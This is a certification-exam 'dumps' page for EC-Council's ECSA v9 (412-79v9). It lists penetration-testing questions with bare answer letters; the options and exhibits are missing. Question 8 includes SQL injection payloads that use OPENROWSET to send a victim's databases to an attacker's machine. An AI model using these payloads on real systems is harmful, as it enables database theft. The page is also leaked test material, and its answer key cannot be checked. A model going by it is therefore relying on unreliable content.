A Review Of Exact 412-79v9 Preparation Labs

Refined of 412-79v9 free practice questions materials and preparation exams for EC-Council certification for client, Real Success Guaranteed with Updated 412-79v9 pdf dumps vce Materials. 100% PASS EC-Council Certified Security Analyst (ECSA) v9 exam Today!

EC-Council 412-79v9 Free Dumps Questions Online, Read and Test Now.

Page: 1 / 16
Total 203 questions Full Exam Access
Question 1
Amazon, an IT based company, conducts a survey on the usage of the Internet. They found that company employees spend most of the time at work surfing the web for their personal use and for inappropriate web site viewing. Management decide to block all such web sites using URL filtering software.
412-79v9 dumps exhibit
How can employees continue to see the blocked websites?
My answer: -
Reference answer: B
Reference analysis:

None

Question 2
A penetration tester performs OS fingerprinting on the target server to identify the operating system used on the target server with the help of ICMP packets.
412-79v9 dumps exhibit
While performing ICMP scanning using Nmap tool, message received/type displays “3 – Destination Unreachable[5]” and code 3.
Which of the following is an appropriate description of this response?
My answer: -
Reference answer: A
Reference analysis:

None

Question 3
Which one of the following scans starts, but does not complete the TCP handshake sequence for each port selected, and it works well for direct scanning and often works well through firewalls?
My answer: -
Reference answer: A
Reference analysis:

None

Question 4
Which of the following policies helps secure data and protects the privacy of organizational information?
My answer: -
Reference answer: C
Reference analysis:

None

Question 5
You are conducting a penetration test against a company and you would like to know a personal email address of John, a crucial employee. What is the fastest, cheapest way to find out John’s email address.
412-79v9 dumps exhibit
My answer: -
Reference answer: D
Reference analysis:

None

Question 6
Due to illegal inputs, various types of TCP stacks respond in a different manner. Some IDSs do not take into account the TCP protocol's urgency feature, which could allow testers to evade the IDS.
412-79v9 dumps exhibit
Penetration tester needs to try different combinations of TCP flags (e.g. none, SYN/FIN, SYN/RST, SYN/FIN/ACK, SYN/RST/ACK, and All Flags) to test the IDS.
Which of the following TCP flag combinations combines the problem of initiation, midstream, and termination flags with the PSH and URG?
My answer: -
Reference answer: D
Reference analysis:

Reference: http://books.google.com.pk/books?id=tUCumJot0ocC&pg=PA63&lpg=PA63&dq=TCP+flag
+combinations+combines+the+problem+of+initiation,+midstream,+and+termination+flags+ with+the+PSH+and+URG&source=bl&ots=mIGSXBIi15&sig=WMnXlEChVSU4RhK65W_V 3tzNjns&hl=en&sa=X&ei=H7AfVJCtLaufygO1v4DQDg&ved=0CBsQ6AEwAA#v=onepage& q=TCP%20flag%20combinations%20combines%20the%20problem%20of%20initiation%2 C%20midstream%2C%20and%20termination%20flags%20with%20the%20PSH%20and% 20URG&f=false (see the highlighted sentence in Table 3-1 at the end of the page)

Question 7
SQL injection attacks are becoming significantly more popular amongst hackers and there has been an estimated 69 percent increase of this attack type.
This exploit is used to great effect by the hacking community since it is the primary way to steal sensitive data from web applications. It takes advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a back- end database.
The below diagram shows how attackers launched SQL injection attacks on web applications.
412-79v9 dumps exhibit
Which of the following can the attacker use to launch an SQL injection attack?
My answer: -
Reference answer: D
Reference analysis:

None

Question 8
A penetration tester tries to transfer the database from the target machine to a different machine. For this, he uses OPENROWSET to link the target database to his own database, replicates the database structure, and transfers the data to his machine by via a connection to the remote machine on port 80.
The query he used to transfer databases was: '; insert into OPENROWSET
('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select *
from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases – The query he used to transfer table 1 was:
'; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1 –
What query does he need in order to transfer the column?
My answer: -
Reference answer: C
Reference analysis:

None

Question 9
Which of the following approaches to vulnerability assessment relies on the administrator providing baseline of system configuration and then scanning continuously without incorporating any information found at the time of scanning?
412-79v9 dumps exhibit
My answer: -
Reference answer: C
Reference analysis:

Reference: http://www.netsense.info/downloads/security_wp_mva.pdf (page 12, tree-based assessment technology, second para)

Question 10
In Linux, /etc/shadow file stores the real password in encrypted format for user’s account with added properties associated with the user’s password.
412-79v9 dumps exhibit
In the example of a /etc/shadow file below, what does the bold letter string indicate?
Vivek: $1$fnffc$GteyHdicpGOfffXX40w#5:13064:0:99999:7
My answer: -
Reference answer: B
Reference analysis:

Reference: http://www.cyberciti.biz/faq/understanding-etcshadow-file/ (bullet # 4)

Question 11
Logs are the record of the system and network activities. Syslog protocol is used for delivering log information across an IP network. Syslog messages can be sent via which one of the following?
My answer: -
Reference answer: A
Reference analysis:

None

Question 12
Identify the port numbers used by POP3 and POP3S protocols.
My answer: -
Reference answer: C
Reference analysis:

Reference: https://publib.boulder.ibm.com/infocenter/wsmashin/v1r1/index.jsp?topic=/com.ibm.websph ere.sMash.doc/using/zero.mail/MailStoreConfiguration.html

Question 13
What is the maximum value of a “tinyint” field in most database systems?
My answer: -
Reference answer: D
Reference analysis:

Reference: http://books.google.com.pk/books?id=JUcIAAAAQBAJ&pg=SA3-PA3&lpg=SA3-PA3&dq=maximum+value+of+a+%E2%80%9Ctinyint%E2%80%9D+field+in+most+database+systems&source=bl&ots=NscGk-- R5r&sig=1hMOYByxt7ebRJ4UEjbpxMijTQs&hl=en&sa=X&ei=pvgeVJnTCNDkaI_fgugO&ved=0CDYQ6AEwAw#v=onepage&q=maximum%20value%20of%20a%20%E2%80%9Ctinyint%E2%80%9D%20field%20in%20most%20database%20systems&f=false

Question 14
Which Wireshark filter displays all the packets where the IP address of the source host is 10.0.0.7?
412-79v9 dumps exhibit
My answer: -
Reference answer: C
Reference analysis:

None

Question 15
Rules of Engagement (ROE) document provides certain rights and restriction to the test team for performing the test and helps testers to overcome legal, federal, and policy-related restrictions to use different penetration testing tools and techniques.
412-79v9 dumps exhibit
What is the last step in preparing a Rules of Engagement (ROE) document?
My answer: -
Reference answer: C
Reference analysis:

None

Question 16
Which of the following is a framework of open standards developed by the Internet Engineering Task Force (IETF) that provides secure transmission of the sensitive data over an unprotected medium, such as the Internet?
My answer: -
Reference answer: D
Reference analysis:

Reference: http://www.cisco.com/c/en/us/td/docs/net_mgmt/vpn_solutions_center/2-0/ip_security/provisioning/guide/IPsecPG1.html

Question 17
Identify the type of firewall represented in the diagram below:
412-79v9 dumps exhibit
My answer: -
Reference answer: A
Reference analysis:

Reference: http://www.technicolorbroadbandpartner.com/getfile.php?id=4159 (page 13)

Question 18
During external penetration testing, which of the following techniques uses tools like Nmap to predict the sequence numbers generated by the targeted server and use this information to perform session hijacking techniques?
My answer: -
Reference answer: A
Reference analysis:

Reference: http://www.scribd.com/doc/133636402/LPTv4-Module-18-External-Penetration-Testing-NoRestriction (p.43)

Question 19
Output modules allow Snort to be much more flexible in the formatting and presentation of output to its users. Snort has 9 output plug-ins that push out data in different formats. Which one of the following output plug-ins allows alert data to be written in a format easily importable to a database?
My answer: -
Reference answer: B
Reference analysis:

None

Question 20
An automated electronic mail message from a mail system which indicates that the user does not exist on that server is called as?
My answer: -
Reference answer: D
Reference analysis:

Reference: http://en.wikipedia.org/wiki/Bounce_message

Question 21
What are placeholders (or markers) in an HTML document that the web server will dynamically replace with data just before sending the requested documents to a browser?
My answer: -
Reference answer: A
Reference analysis:

None

Question 22
Vulnerability assessment is an examination of the ability of a system or application, including the current security procedures and controls, to withstand assault.
412-79v9 dumps exhibit
What does a vulnerability assessment identify?
My answer: -
Reference answer: B
Reference analysis:

None

Question 23
If a web application sends HTTP cookies as its method for transmitting session tokens, it may be vulnerable which of the following attacks?
My answer: -
Reference answer: D
Reference analysis:

Reference: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Question 24
Phishing is typically carried out by email spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.
Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
412-79v9 dumps exhibit
What characteristics do phishing messages often have that may make them identifiable?
My answer: -
Reference answer: C
Reference analysis:

None

Question 25
Which of the following external pen testing tests reveals information on price, usernames and passwords, sessions, URL characters, special instructors, encryption used, and web page behaviors?
412-79v9 dumps exhibit
My answer: -
Reference answer: C
Reference analysis:

Reference: http://www.scribd.com/doc/133636402/LPTv4-Module-18-External-Penetration-Testing-NoRestriction (page 71)

Question 26
A man enters a PIN number at an ATM machine, being unaware that the person next to him was watching. Which of the following social engineering techniques refers to this type of information theft?
My answer: -
Reference answer: A
Reference analysis:

None

Question 27
Identify the type of testing that is carried out without giving any information to the employees or administrative head of the organization.
My answer: -
Reference answer: B
Reference analysis:

None

Question 28
Besides the policy implications of chat rooms, Internet Relay Chat (IRC) is frequented by attackers and used as a command and control mechanism. IRC normally uses which one of the following TCP ports?
My answer: -
Reference answer: C
Reference analysis:

None

Question 29
Which of the following protocols cannot be used to filter VoIP traffic?
My answer: -
Reference answer: D
Reference analysis:

None

Question 30
Which of the following are the default ports used by NetBIOS service?
My answer: -
Reference answer: A
Reference analysis:

None

Page: 1 / 16
Total 203 questions Full Exam Access